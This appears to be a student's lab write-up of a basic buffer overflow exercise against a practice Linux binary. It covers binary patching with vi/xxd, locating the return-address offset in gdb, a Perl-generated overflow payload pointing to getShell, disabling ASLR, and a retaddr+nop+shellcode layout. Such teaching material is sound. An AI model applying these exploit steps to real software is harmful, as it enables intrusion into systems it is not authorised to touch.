Exp1 Reverse engineering and BOF basic practice - 20202127

1 Reverse and Bof basic practice instructions

1.1 Practical goals

Practice object : a linux executable file named pwn1 (renamed pwn2127).
The normal execution flow of the program : main calls the foo function, and the foo function simply echoes any string entered by the user.
The program also includes another piece of code, getShell, that returns a usable Shell.
Under normal circumstances getShell will not be run. The practical goal is to find a way to run getShell.

Practice content :

  • Manually modify the executable file, change the program execution flow, and jump directly to the getShell function.
  • Use the Bof vulnerability of the foo function to construct an attack input string, overwrite the return address, and trigger the getShell function.
  • Inject a self-made shellcode and run this shellcode.

1.2 Basic knowledge

Assembly knowledge

  • call : Calls a subroutine. It first pushes the return address (the address of the next instruction, i.e. the current value of EIP) onto the top of the stack, and then jumps to the start address of the called subroutine.
    call=push eip + jump
  • leave : Closes the stack frame. It first points the stack pointer at the frame pointer, and then pops the backed-up original frame pointer into %EBP.
    leave=mov %ebp,%esp + pop %ebp
  • ret : The return instruction of the subroutine. The return address at the top of the stack is popped to EIP, and the program continues to execute according to the instruction address indicated by EIP at this time.
    ret=pop eip
  • NOP : The NOP instruction is the "empty instruction". When the NOP instruction is executed, the CPU does nothing, just executes it as an instruction and continues to execute the instruction after the NOP. (Machine code: 90)
  • EIP : Register, which stores the memory address of the next instruction to be executed by the CPU. For example: the main function calls a sub-function, and EIP indicates which instruction to execute when returning to the main function after the sub-function is executed.
  • ESP : Register, which stores the top pointer of the stack, and always points to the top of the stack.
  • EBP : Register, which stores the base (bottom) pointer of the current stack frame. On entering a subfunction, ESP passes its value to EBP as the bottom of the new frame; when the subfunction returns, EBP passes its value back to ESP, and ESP points to the top of the caller's stack again.
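
To make the call / leave / ret equations above concrete, here is a minimal sketch of a toy 32-bit stack in Python. The class name ToyCPU, the starting values of ESP and EBP, and the enter_frame helper (modelling the usual "push %ebp; mov %esp,%ebp" function prologue) are assumptions made for illustration; only the two code addresses are taken from this experiment.

```python
# Toy model of a 32-bit x86 stack. Not an emulator: it only tracks
# ESP, EBP, EIP and the words pushed on the stack.
class ToyCPU:
    def __init__(self, esp=0x1000, ebp=0x2000, eip=0):
        self.mem = {}  # address -> 32-bit value
        self.esp, self.ebp, self.eip = esp, ebp, eip

    def push(self, value):
        self.esp -= 4  # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, target, next_eip):
        self.push(next_eip)  # call = push eip
        self.eip = target    #      + jump

    def enter_frame(self):
        self.push(self.ebp)  # push %ebp (assumed standard prologue)
        self.ebp = self.esp  # mov %esp,%ebp

    def leave(self):
        self.esp = self.ebp    # mov %ebp,%esp
        self.ebp = self.pop()  # pop %ebp

    def ret(self):
        self.eip = self.pop()  # ret = pop eip


cpu = ToyCPU()
cpu.call(target=0x8048491, next_eip=0x80484ba)  # main calls foo
cpu.enter_frame()
cpu.esp -= 0x38  # reserve space for local variables
cpu.leave()
cpu.ret()
print(hex(cpu.eip))  # 0x80484ba
```

After leave and ret, ESP and EBP are back at their starting values and EIP holds the return address that call pushed. This is the value that the overflow in section 3 replaces.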

Linux knowledge

  • objdump -d : Disassembles the sections of objfile that contain machine code into assembly instructions.
  • "|" : Pipe; the output of the command before it is used as the input of the command after it.
  • ">" : Output redirection operator; writes the output of the command before it into the file named after it.
  • more : Displays the contents of a file page by page.
  • perl : Perl is an interpreted language that does not require precompilation and can be used directly on the command line. "perl -e" is followed by a string enclosed in single quotes, which is the Perl code to execute; use output redirection ">" to store the string generated by perl in a file.
  • xxd : Produces a hexadecimal dump of standard input or a given file; with -r it can also convert a hexadecimal dump back to the original binary format.
  • ps -ef : Displays all processes, including the UID, PPID, C and STIME fields of each process.
  • Little-endian mode : the high byte of data is stored in the high address of memory, and the low byte of data is stored in the low address of memory.
  • Big-endian mode : the high byte of data is stored in the low address of memory, and the low byte of data is stored in the high address of memory, which is consistent with the reading habits.
  • Stack : LIFO, the top of the stack is low and the bottom of the stack is high, the direction of growth is from high address to low address, and the direction of instruction execution is from low address to high address.
  • shellcode : A piece of machine instruction (code). Usually the purpose of this machine instruction is to obtain an interactive shell (like a linux shell or similar to cmd.exe under windows), so this machine instruction is called shellcode. In practical applications, any machine instruction segment used for injection is commonly called shellcode, such as adding a user and running an instruction.
  • ASLR : Address Space Layout Randomization. This is a security protection technique against buffer overflows. With ASLR, the addresses at which the stack, heap and libraries are placed change randomly every time the program is loaded into memory.
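
The difference between the two byte orders can be checked with a short Python sketch. It uses the standard struct module and, as an example value, the getShell address 0x0804847d that appears later in this experiment.

```python
import struct

value = 0x0804847d

little = struct.pack("<I", value)  # "<" = little-endian, "I" = 32-bit unsigned
big = struct.pack(">I", value)     # ">" = big-endian

print(little.hex())  # 7d840408  (low byte at the lowest address)
print(big.hex())     # 0804847d  (same order as we read the number)
```

On x86 the little-endian form is the one that ends up in memory, which is why addresses look "reversed" in a hex dump.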

2 Directly modify the program machine instructions to change the program execution flow

Download the target file pwn1, change the file name to a name related to your student number (I changed it to pwn2127 in the experiment), and then disassemble it with objdump -d pwn1 | more.

more is a pager that displays its input page by page. The pipe "|" feeds the output of the preceding command into the "more" after it.

Keep pressing Enter to display more output line by line until the relevant code is found.

In the main function, the assembly instruction "call 8048491" calls the foo function at address 8048491. The corresponding machine instruction is "e8 d7ffffff": e8 is the opcode of call, and the CPU will execute the instruction at the address "EIP + d7ffffff", where d7ffffff is the little-endian encoding of the offset 0xffffffd7 (-41).
The disassembly shows that the address of the foo function is 0x8048491, so at the moment of the jump EIP=0x8048491-0xffffffd7=0x80484ba (in 32-bit arithmetic), which is the address of the instruction following the call.
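
The offset arithmetic can be verified with a few lines of Python. This is only a sketch: the helper names call_rel32 and call_target are made up here, and 0x804847d is the getShell address given in section 3.1.

```python
MASK32 = 0xFFFFFFFF

def call_rel32(next_eip, target):
    """Offset stored after the e8 opcode: target minus the address after the call."""
    return (target - next_eip) & MASK32

def call_target(next_eip, rel32):
    """Address the CPU jumps to: EIP + offset, wrapped to 32 bits."""
    return (next_eip + rel32) & MASK32

NEXT_EIP = 0x80484ba  # address of the instruction following the call

print(hex(call_target(NEXT_EIP, 0xffffffd7)))  # 0x8048491 (foo)
print(hex(call_rel32(NEXT_EIP, 0x804847d)))    # 0xffffffc3 (offset for getShell)
print(call_rel32(NEXT_EIP, 0x804847d).to_bytes(4, "little").hex())  # c3ffffff
```

So redirecting the call to getShell only requires changing the first offset byte from d7 to c3.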

Copy the file with cp pwn1 pwn2.

Modify the executable file to change the offset of the call instruction from d7ffffff to c3ffffff, so that it calls getShell instead of foo:

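  1. Open pwn2 with vi, press the Esc key on the garbled screen, and then type :%!xxd
  2. Find e8d7 and change d7 to c3 (press i to enter insert mode before editing, and Esc to leave it)
  3. Type :%!xxd -r
  4. Type :wq to save and exit
vi pwn2127			          # open the target file
:%!xxd				              # convert to hexadecimal
/d7				                  # search for the bytes to modify
rclr3				              # change "d7" to "c3": rc replaces d with c, l moves right, r3 replaces 7 with 3
:%!xxd -r 			              # convert the hexadecimal dump back to the original format
:wq				                  # save and exit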
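
As an alternative to editing in vi, the same one-byte change could be scripted. The following Python sketch is not part of the original experiment; the function names are hypothetical, and it assumes that the byte sequence e8 d7 ff ff ff occurs exactly once in the file (it raises an error otherwise instead of guessing).

```python
from pathlib import Path

OLD = bytes.fromhex("e8d7ffffff")  # call foo      (offset 0xffffffd7)
NEW = bytes.fromhex("e8c3ffffff")  # call getShell (offset 0xffffffc3)

def patch_call(data: bytes, old: bytes = OLD, new: bytes = NEW) -> bytes:
    """Return a copy of data with the single occurrence of old replaced by new."""
    count = data.count(old)
    if count != 1:
        raise ValueError(f"expected exactly one match, found {count}")
    return data.replace(old, new)

def patch_file(src: str, dst: str) -> None:
    """Read src, patch the call instruction, and write the result to dst."""
    Path(dst).write_bytes(patch_call(Path(src).read_bytes()))

# Self-check on made-up bytes (not the real binary):
sample = b"\x90\x90" + OLD + b"\xc9\xc3"
print(patch_call(sample).hex())  # 9090e8c3ffffffc9c3
```

A call such as patch_file("pwn1", "pwn2") would produce the patched copy; a newly written file may still need chmod +x before it can be run.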

Disassemble again with objdump -d pwn2127 | more to check whether the modification is correct.
Then run pwn2127 again, and the program execution flow has changed.
The original program echoed the input string; now a shell appears, and any command can be entered.

3 By constructing input parameters, causing BOF attacks and changing program execution flow

3.1 Disassembly to understand the basic functions of the program

It can be seen from the disassembly that the foo function reserves 0x38 (56 bytes) of stack space for local variables, of which 0x1c (28 bytes) are used for the string read by "gets".

If the string read by gets is longer than 32 bytes (28 bytes for the 0x1c buffer + 4 bytes for the saved EBP), the excess overwrites the location of the saved EIP, i.e. the return address.

As long as the string we constructed can overflow to the location of EIP and overwrite the return address "80484ba" in it with the address "804847d" of the getShell function, the program will return to the getShell function to execute after executing the foo function.
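
The 32-byte figure follows directly from the frame layout. The sketch below just restates that arithmetic in Python; the function name and dictionary keys are made up for illustration, and it assumes the usual layout where the saved EBP sits directly above the buffer and the return address directly above the saved EBP.

```python
def frame_layout(buf_below_ebp=0x1c, saved_ebp_size=4, ret_size=4):
    """Offsets, measured from the start of the gets buffer, of the saved EBP
    and of the return address."""
    saved_ebp_offset = buf_below_ebp                  # buffer starts at ebp-0x1c
    ret_offset = saved_ebp_offset + saved_ebp_size    # return address is at ebp+4
    return {
        "saved_ebp": (saved_ebp_offset, saved_ebp_offset + saved_ebp_size),
        "ret_addr": (ret_offset, ret_offset + ret_size),
    }

layout = frame_layout()
print(layout["saved_ebp"])  # (28, 32)
print(layout["ret_addr"])   # (32, 36)
```

Counting from zero, input bytes 32 to 35 (the 33rd to 36th bytes) land on the return address.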

3.2 Confirm which characters of the input string will overwrite the return address

3.2.1 Install gdb

sudo chmod a+w /etc/apt/sources.list
sudo chmod a-w /etc/apt/sources.list
sudo su
apt-get update
apt-get install gdb

3.2.2 Analysis of characters covering the return address

Use gdb to debug the program, and enter "r" to run it.

gdb pwn2127	# start gdb to debug the program pwn2127

Enter the string "12345abcdefghijklmnopqrstuvwxyz67890", which is 36 bytes long. After the echo is displayed, a segmentation fault occurs.

(gdb) r
Starting program: /root/pwn2127 
12345abcdefghijklmnopqrstuvwxyz67890
12345abcdefghijklmnopqrstuvwxyz67890

Program received signal SIGSEGV, Segmentation fault.
0x30393837 in ?? ()

View the values of all current registers. The value of EIP is "0x30393837", which corresponds to the characters "0987" (the input "7890" stored in little-endian order), exactly the 33rd to 36th bytes of our input.

(gdb) info r		# display the register values
eax            0x25                37
ecx            0xf7fad890          -134555504
edx            0x25                37
ebx            0x0                 0
esp            0xffffd360          0xffffd360
ebp            0x367a7978          0x367a7978
esi            0xf7fac000          -134561792
edi            0xf7fac000          -134561792
eip            0x30393837          0x30393837
eflags         0x10246             [ PF ZF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Therefore, it can be judged that the content of the 33rd to 36th bytes input will overwrite the return address on the stack, and then the CPU will try to run the code at this location.

Then, as long as these four bytes are replaced with the memory address "804847d" of getShell, pwn2127 will run getShell.
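
The position of the overwriting bytes can also be computed from the crash values instead of being counted by hand. This is a minimal Python sketch; the function name offset_in_input is hypothetical, and the register values are the ones shown in the gdb output above.

```python
import struct

def offset_in_input(pattern: bytes, reg_value: int) -> int:
    """Zero-based offset in pattern of the 4 bytes that ended up in a register
    (little-endian), or -1 if they do not occur."""
    return pattern.find(struct.pack("<I", reg_value))

pattern = b"12345abcdefghijklmnopqrstuvwxyz67890"

print(offset_in_input(pattern, 0x30393837))  # 32 -> EIP came from bytes 33..36
print(offset_in_input(pattern, 0x367a7978))  # 28 -> EBP came from bytes 29..32
```

This only works because every 4-byte window of the test string is unique, so each register value maps to a single position.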

3.3 Confirm what value to use to cover the return address

When the input is "7890", the value of EIP is "0x30393837", which shows that the byte order is little-endian (low byte first).

To get "0804847d", the input sequence should be "7d 84 04 08", which is "32 characters +\x7d\x84\x04\x08".

3.4 Constructing the input string

However, "\x7d\x84\x04\x08" cannot be typed on the keyboard, so the input must be generated by a program (Perl).

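perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input20192415	# store this string in the file input20192415 (0a is the Enter key; without it, Enter must be pressed manually when the program runs)
xxd input20192415	    # verify that the constructed string is as expected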
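
For comparison, the same input string can be built in Python. This is a sketch equivalent to the Perl one-liner above, not a replacement used in the experiment; the function name write_input is hypothetical.

```python
import struct
from pathlib import Path

PADDING = b"11111111222222223333333344444444"  # 32 filler bytes
GETSHELL = 0x0804847d                          # address of getShell

# 32 bytes of padding + little-endian return address + newline (Enter)
payload = PADDING + struct.pack("<I", GETSHELL) + b"\n"

def write_input(path: str) -> None:
    """Store the payload in a file, like the > redirection does."""
    Path(path).write_bytes(payload)

print(len(payload))             # 37
print(payload[32:].hex())       # 7d8404080a
```

Using struct.pack avoids having to reverse the address bytes by hand.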


4 Inject Shellcode and execute it

4.1 Prepare a Shellcode

Shellcode is a piece of machine instructions (code).

Usually the purpose of these machine instructions is to obtain an interactive shell (like a linux shell or something similar to cmd.exe under windows), which is why they are called shellcode.

In practice, any piece of machine instructions used for injection is commonly called shellcode, for example code that adds a user or runs a command.

4.2 Preparations

Run sudo apt-get install execstack to install the execstack command, and then follow the tutorial:

  1. First set the stack to be executable with execstack -s
  2. Then use execstack -q to query whether the stack of the file is executable
  3. Checking randomize_va_space shows 2, that is, address randomization protection is turned on
  4. Turn off address randomization
  5. Checking randomize_va_space again shows 0, that is, address randomization protection is turned off
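
The randomize_va_space value can also be read and interpreted from a script. The sketch below assumes the standard Linux location /proc/sys/kernel/randomize_va_space; the function names are made up for illustration, and the script only reads the setting (changing it requires root).

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

MEANING = {
    0: "address randomization is off",
    1: "stack, mmap base and vdso are randomized",
    2: "stack, mmap base, vdso and heap are randomized",
}

def describe_aslr(raw: str) -> str:
    """Translate the content of randomize_va_space into a description."""
    return MEANING.get(int(raw.strip()), "unknown setting")

def current_aslr() -> str:
    """Read the live setting from /proc (Linux only)."""
    return describe_aslr(ASLR_PATH.read_text())

if ASLR_PATH.exists():
    print(current_aslr())
```

For the shellcode injection in this section to hit a fixed address, the value has to be 0.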

4.3 Construct the payload to be injected

There are two basic methods of constructing attack buf under Linux:

  • retaddr+nop+shellcode
  • nop+shellcode+retaddr

Because the position of retaddr in the buffer is fixed, the shellcode is either in front of it or behind it.

Simply put, if the buffer is small, put the shellcode behind retaddr, and if the buffer is large, put the shellcode in front of it.

Although our buf is large enough for this shellcode, the shellcode is put behind retaddr in this experiment.

The structure is: retaddr+nop+shellcode

The nop has two purposes: one is padding, and the other is to act as a "landing area/sliding area".
As long as the return address we guess falls on any nop, execution will naturally slide into our shellcode.
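
The retaddr+nop+shellcode layout can be sketched in Python as follows. Everything here is illustrative: the function name, the number of nops and the filler byte are assumptions, the 32-byte padding is the distance to the return address found in section 3, 0x01020304 is the placeholder return address that is looked for in gdb, and the "shellcode" is just four int3 (0xcc) bytes standing in for a real one.

```python
import struct

NOP = b"\x90"

def build_attack_buf(ret_addr: int, shellcode: bytes,
                     pad_len: int = 32, nop_count: int = 4) -> bytes:
    """padding up to the return address + retaddr + nop sled + shellcode"""
    padding = b"A" * pad_len
    return padding + struct.pack("<I", ret_addr) + NOP * nop_count + shellcode

placeholder_shellcode = b"\xcc" * 4  # stand-in bytes, not real shellcode
buf = build_attack_buf(0x01020304, placeholder_shellcode)

print(len(buf))           # 44
print(buf[32:36].hex())   # 04030201 (placeholder retaddr, little-endian)
print(buf[36:40].hex())   # 90909090 (nop sled)
```

Once the real address of the nop sled is known, the placeholder is replaced by calling build_attack_buf again with that address.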

Open two terminals and switch to root in both.

In terminal 1, inject the attack buf and press Enter only once; according to the guide, no garbled characters should appear at this point.

In terminal 2, use gdb to debug the running pwn2127 process.

Garbled characters then appear on terminal 1, and terminal 2 continues to execute. When you see 01020304 in memory, that is the location of the return address. The shellcode is right behind it, so its address is 0xffffd320.

Put 0xffffd320 into the attack buf as the return address. After running it again, a shell is obtained, and the attack is successful.

5 Problems and Solutions

  • Problem 1: The memory address kept changing, and the shellcode injection that had previously succeeded failed after a reboot.

  • Solution to problem 1: The experiment was not finished on the first day, and address randomization is turned back on automatically after the virtual machine is shut down and restarted. Address randomization must be turned off again after each boot.

  • Problem 2: When using xxd for the first time, a "command not found" error appeared.

  • Solution to problem 2: xxd can be used once the xxd package is installed, but this is not mentioned in the experiment guide. Many similar problems come up later, and most of them can be solved by searching online.

6 Experiment experience

Through this experiment, I carried out a buffer overflow attack and understood how the stack and registers change when a function is called. The three parts of the experiment build on each other step by step, which gradually made me familiar with assembly language and machine instructions and improved my ability to analyze how assembly instructions execute.
However, this experiment also showed that my knowledge of Linux commands and assembly is not yet deep or fluent enough, and I need to keep learning and consolidating it. At the same time, the buffer overflow attack succeeded only under favorable conditions such as "turning off the stack execution protection and turning off the address randomization". Without these conditions, there is still a lot to learn.

Origin blog.csdn.net/qq_57435798/article/details/129541170